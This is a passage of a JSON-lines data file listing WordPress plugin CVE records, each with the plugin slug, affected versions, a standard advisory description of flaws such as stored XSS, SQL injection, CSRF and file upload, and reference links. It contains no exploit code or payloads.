disabled.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1df04293-87e9-4ab4-975d-54d36a993ab0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1df04293-87e9-4ab4-975d-54d36a993ab0?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2961909\\\/user-private-files\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2961909\\\/user-private-files\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/xsn1210\\\/vul2\\\/blob\\\/main\\\/xss%5BWordPressFile%5D%20.md\",\"name\":\"https:\\\/\\\/github.com\\\/xsn1210\\\/vul2\\\/blob\\\/main\\\/xss%5BWordPressFile%5D%20.md\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5705","slug":"vk-filter-search","versionImpact":"2.3.1","description":"The VK Filter Search plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'vk_filter_search' shortcode in all versions up to, and including, 2.3.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/012946d4-82ce-48b9-9b9a-1fc49846dca6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/012946d4-82ce-48b9-9b9a-1fc49846dca6?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2983339\\\/vk-filter-search#file1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2983339\\\/vk-filter-search#file1\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/vk-filter-search\\\/tags\\\/2.3.1\\\/inc\\\/filter-search\\\/package\\\/class-vk-filter-search-shortcode.php#L40\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/vk-filter-search\\\/tags\\\/2.3.1\\\/inc\\\/filter-search\\\/package\\\/class-vk-filter-search-shortcode.php#L40\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7084","slug":"voting-record","versionImpact":"2.0","description":"The Voting Record WordPress plugin through 2.0 is missing sanitisation as well as escaping, which could allow any authenticated users, such as subscriber to perform Stored XSS attacks","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5e51e239-919b-4e74-a7ee-195f3817f907\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5e51e239-919b-4e74-a7ee-195f3817f907\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/magos-securitas.com\\\/txt\\\/CVE-2023-7084.txt\",\"name\":\"https:\\\/\\\/magos-securitas.com\\\/txt\\\/CVE-2023-7084.txt\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1159","slug":"bold-page-builder","versionImpact":"4.8.0","description":"The Bold Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 4.8.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e71386ea-0546-4aa7-b77a-e1824e80accc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e71386ea-0546-4aa7-b77a-e1824e80accc?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3034441%40bold-page-builder&new=3034441%40bold-page-builder&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3034441%40bold-page-builder&new=3034441%40bold-page-builder&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2252","slug":"droit-elementor-addons","versionImpact":"3.1.5","description":"The Droit Elementor Addons \u2013 Widgets, Blocks, Templates Library For Elementor Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's widgets in all versions up to, and including, 3.1.5 due to insufficient input sanitization and output escaping on user supplied attributes such as URL. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ed0a9db6-24bd-48ba-befa-ce537304ab52?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ed0a9db6-24bd-48ba-befa-ce537304ab52?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/droit-elementor-addons\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/droit-elementor-addons\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6180","slug":"eventon-lite","versionImpact":"2.2.15","description":"The EventON plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'eventon_import_settings' ajax action in all versions up to, and including, 2.2.15. This makes it possible for unauthenticated attackers to update plugin settings, including adding stored cross-site scripting to settings options displayed on event calendar pages.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/12f3dc64-322d-4015-8c57-eaa41c9a1829?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/12f3dc64-322d-4015-8c57-eaa41c9a1829?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/eventon-lite\\\/trunk\\\/assets\\\/js\\\/admin\\\/wp_admin.js#L714\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/eventon-lite\\\/trunk\\\/assets\\\/js\\\/admin\\\/wp_admin.js#L714\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/eventon-lite\\\/trunk\\\/includes\\\/calendar\\\/class-calendar-event-structure.php#L590\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/eventon-lite\\\/trunk\\\/includes\\\/calendar\\\/class-calendar-event-structure.php#L590\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8633","slug":"form-maker","versionImpact":"1.15.27","description":"The Form Maker by 10Web \u2013 Mobile-Friendly Drag & Drop Contact Form Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 1.15.27 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2b32cc12-c8d5-40b8-9510-42699beec581?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2b32cc12-c8d5-40b8-9510-42699beec581?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/form-maker\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/form-maker\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3156791\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3156791\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11878","slug":"category-post-slider","versionImpact":"1.4","description":"The Category Post Slider plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'category-post-slider' shortcode in all versions up to, and including, 1.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/category-post-slider\\\/tags\\\/1.4\\\/category-post-slider.php#L189\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/category-post-slider\\\/tags\\\/1.4\\\/category-post-slider.php#L189\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e312e3eb-0da9-4ecf-aec6-86bfe08417f5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e312e3eb-0da9-4ecf-aec6-86bfe08417f5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13847","slug":"portfolio-and-projects","versionImpact":"1.5.3","description":"The Portfolio and Projects plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.5.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/portfolio-and-projects\\\/trunk\\\/includes\\\/admin\\\/class-wp-pap-admin.php?rev=2948311\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/portfolio-and-projects\\\/trunk\\\/includes\\\/admin\\\/class-wp-pap-admin.php?rev=2948311\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/portfolio-and-projects\\\/trunk\\\/includes\\\/admin\\\/settings\\\/wp-pap-img-popup-data.php?rev=2948311\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/portfolio-and-projects\\\/trunk\\\/includes\\\/admin\\\/settings\\\/wp-pap-img-popup-data.php?rev=2948311\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/portfolio-and-projects\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/portfolio-and-projects\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/051fb185-5004-42f2-9624-6cba11b01e8d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/051fb185-5004-42f2-9624-6cba11b01e8d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-22282","slug":"ez-form-calculator-premium","versionImpact":"2.14.1.2","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in EPC ez Form Calculator - WordPress plugin allows Reflected XSS.This issue affects ez Form Calculator - WordPress plugin: from n\/a through 2.14.1.2.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/ez-form-calculator-premium\\\/vulnerability\\\/wordpress-ez-form-calculator-wordpress-plugin-plugin-2-14-1-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/ez-form-calculator-premium\\\/vulnerability\\\/wordpress-ez-form-calculator-wordpress-plugin-plugin-2-14-1-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6062","slug":"yougler-blogger-profile-page","versionImpact":"* - v1.01","description":"The Yougler Blogger Profile Page plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, v1.01. This is due to missing or incorrect nonce validation on the 'yougler-plugin.php' page. This makes it possible for unauthenticated attackers to update the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yougler-blogger-profile-page\\\/trunk\\\/yougler-plugin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yougler-blogger-profile-page\\\/trunk\\\/yougler-plugin.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7102fb97-96a4-4fd9-824d-6fa6d483f37a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7102fb97-96a4-4fd9-824d-6fa6d483f37a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5800","slug":"testimonial-post-type","versionImpact":"1.2.1","description":"The Testimonial Post type plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018auto_play\u2019 parameter in all versions up to, and including, 1.2.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/testimonial-post-type\\\/trunk\\\/testimonial-post-type.php#L146\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/testimonial-post-type\\\/trunk\\\/testimonial-post-type.php#L146\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/testimonial-post-type\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/testimonial-post-type\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cd3fe254-e8cb-450b-901b-fdf49209013f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cd3fe254-e8cb-450b-901b-fdf49209013f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0553","slug":"quick-restaurant-menu","versionImpact":"2.0.2","description":"The Quick Restaurant Menu plugin for WordPress is vulnerable to Stored Cross-Site Scripting via its settings parameters in versions up to, and including, 2.0.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/quick-restaurant-menu\\\/tags\\\/2.0.2\\\/includes\\\/admin\\\/settings\\\/settings.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/quick-restaurant-menu\\\/tags\\\/2.0.2\\\/includes\\\/admin\\\/settings\\\/settings.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cfd8a6a4-9159-480f-abe2-71972585217b\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cfd8a6a4-9159-480f-abe2-71972585217b\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2851871\\\/quick-restaurant-menu\\\/trunk?contextall=1&old=2788636&old_path=%2Fquick-restaurant-menu%2Ftrunk\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2851871\\\/quick-restaurant-menu\\\/trunk?contextall=1&old=2788636&old_path=%2Fquick-restaurant-menu%2Ftrunk\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36696","slug":"product-input-fields-for-woocommerce","versionImpact":"1.2.6","description":"The Product Input Fields for WooCommerce plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on the handle_downloads() function in versions up to, and including, 1.2.6. This makes it possible for unauthenticated attackers to download files from the vulnerable service.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/01e41573-9329-48e1-9191-e8e1532f7afc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/01e41573-9329-48e1-9191-e8e1532f7afc?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2349889%40product-input-fields-for-woocommerce&new=2349889%40product-input-fields-for-woocommerce&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2349889%40product-input-fields-for-woocommerce&new=2349889%40product-input-fields-for-woocommerce&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/15f345e6-fc53-4bac-bc5a-de898181ea74\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/15f345e6-fc53-4bac-bc5a-de898181ea74\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/high-severity-vulnerability-fixed-in-product-input-fields-for-woocommerce\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/high-severity-vulnerability-fixed-in-product-input-fields-for-woocommerce\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4773","slug":"wordpress-social-login","versionImpact":"3.0.4","description":"The WordPress Social Login plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'wordpress_social_login_meta' shortcode in versions up to, and including, 3.0.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-social-login\\\/tags\\\/3.0.4\\\/includes\\\/widgets\\\/wsl.auth.widgets.php#L413\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-social-login\\\/tags\\\/3.0.4\\\/includes\\\/widgets\\\/wsl.auth.widgets.php#L413\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b987822d-2b1b-4f79-988b-4bd731864b63?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b987822d-2b1b-4f79-988b-4bd731864b63?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5426","slug":"post-meta-data-manager","versionImpact":"1.2.0","description":"The Post Meta Data Manager plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the pmdm_wp_delete_user_meta,  pmdm_wp_delete_term_meta, and pmdm_wp_ajax_delete_meta functions in versions up to, and including, 1.2.0. This makes it possible for unauthenticated attackers to delete user, term, and post meta belonging to arbitrary users.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2981559\\\/post-meta-data-manager\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2981559\\\/post-meta-data-manager\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d6a7f882-4582-4b08-9597-329d140ad782?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d6a7f882-4582-4b08-9597-329d140ad782?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7083","slug":"voting-record","versionImpact":"2.0","description":"The Voting Record WordPress plugin through 2.0 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ba77704a-32a1-494b-b2c0-e1c2a3f98adc\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ba77704a-32a1-494b-b2c0-e1c2a3f98adc\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/magos-securitas.com\\\/txt\\\/CVE-2023-7083.txt\",\"name\":\"https:\\\/\\\/magos-securitas.com\\\/txt\\\/CVE-2023-7083.txt\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1157","slug":"bold-page-builder","versionImpact":"4.8.0","description":"The Bold Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's button URL in all versions up to, and including, 4.8.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e166a7db-45f7-4a0d-9966-dbec9ade204a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e166a7db-45f7-4a0d-9966-dbec9ade204a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bold-page-builder\\\/trunk\\\/content_elements\\\/bt_bb_button\\\/bt_bb_button.php#L161\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bold-page-builder\\\/trunk\\\/content_elements\\\/bt_bb_button\\\/bt_bb_button.php#L161\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3034441%40bold-page-builder&new=3034441%40bold-page-builder&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3034441%40bold-page-builder&new=3034441%40bold-page-builder&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2239","slug":"premium-addons-pro","versionImpact":"2.9.12","description":"The Premium Addons PRO plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Premium Magic Scroll module in all versions up to, and including, 2.9.12 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/254f3a1c-0d5d-499b-9da7-129f21ba70af?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/254f3a1c-0d5d-499b-9da7-129f21ba70af?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/premiumaddons.com\\\/change-log\\\/\",\"name\":\"https:\\\/\\\/premiumaddons.com\\\/change-log\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4847","slug":"alttext-ai","versionImpact":"1.4.9","description":"The Alt Text AI \u2013 Automatically generate image alt text for SEO and accessibility plugin for WordPress is vulnerable to generic SQL Injection via the \u2018last_post_id\u2019 parameter in all versions up to, and including, 1.4.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3c192623-eb46-4f1d-b897-433ac80608cb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3c192623-eb46-4f1d-b897-433ac80608cb?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/alttext-ai\\\/trunk\\\/includes\\\/class-atai-attachment.php#L677\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/alttext-ai\\\/trunk\\\/includes\\\/class-atai-attachment.php#L677\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3086107\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3086107\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/alttext-ai\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/alttext-ai\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6161","slug":"default-thumbnail-plus","versionImpact":"1.0.2.3","description":"The Default Thumbnail Plus plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'get_cache_image' function in all versions up to, and including, 1.0.2.3. This makes it possible for authenticated attackers, with contributor-level and above permissions, to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/046f11b6-7d1a-4bd3-8250-4c5a50fab3ff?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/046f11b6-7d1a-4bd3-8250-4c5a50fab3ff?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/default-thumbnail-plus\\\/trunk\\\/default-thumbnail-plus.php?rev=597280#L337\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/default-thumbnail-plus\\\/trunk\\\/default-thumbnail-plus.php?rev=597280#L337\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10522","slug":"co-marquage-service-public","versionImpact":"0.5.76","description":"The Co-marquage service-public.fr plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 0.5.76. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/co-marquage-service-public\\\/tags\\\/0.5.76\\\/includes\\\/admin\\\/notices.class.php#L37\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/co-marquage-service-public\\\/tags\\\/0.5.76\\\/includes\\\/admin\\\/notices.class.php#L37\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/co-marquage-service-public\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/co-marquage-service-public\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/664f43a6-6461-42ce-a3e4-2277c01a0efb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/664f43a6-6461-42ce-a3e4-2277c01a0efb?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
